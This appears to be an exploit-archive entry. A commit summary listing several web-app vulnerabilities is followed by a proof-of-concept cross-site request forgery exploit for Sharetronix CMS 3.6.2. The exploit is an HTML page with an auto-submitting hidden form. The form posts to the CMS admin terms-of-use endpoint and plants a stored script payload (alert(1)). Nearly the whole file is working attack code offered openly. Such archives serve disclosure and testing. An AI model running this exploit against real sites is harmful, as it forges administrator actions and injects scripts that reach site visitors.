3df6650dac
11 changes to exploits/shellcodes Werewolf Online 0.8.8 - Information Disclosure Bitmain Antminer D3/L3+/S9 - Remote Command Execution Wordpress Plugin Events Calendar - SQL Injection / Cross-Site Scripting Ingenious School Management System - 'id' SQL Injection Sharetronix CMS 3.6.2 - Cross-Site Request Forgery / Cross-Site Scripting Lyrist - 'id' SQL Injection BookingWizz Booking System 5.5 - 'id' SQL Injection Listing Hub CMS 1.0 - SQL Injection ClipperCMS 1.3.3 - Cross-Site Scripting My Directory 2.0 - SQL Injection / Cross-Site Scripting Baby Names Search Engine 1.0 - 'a' SQL Injection
17 lines
No EOL
614 B
HTML
17 lines
No EOL
614 B
HTML
# Exploit Title: Sharetronix CMS XSRF Vulnerability
|
|
# Version : 3.6.2
|
|
# Exploit Author: Hesam Bazvand
|
|
# Software Link: http://sharetronix.ir/wp-content/uploads/2014/10/gold.zip
|
|
# Tested on: Windows 10 / Kali Linux
|
|
# Category: WebApps
|
|
# Dork : Use You Mind :D
|
|
# Email : Black.king066@gmail.com
|
|
# Video : https://youtu.be/S1r0tmXEUec
|
|
|
|
|
|
<body onload="document.fm.submit()">
|
|
<form method="post" name="fm" action="http://localhost/share/admin/termsofuse">
|
|
<input type="hidden" name="tos_enabled" value="1" />
|
|
<input type="hidden" name="tos_content"value="<script>alert(1);</script>" />
|
|
</form>
|
|
</body> |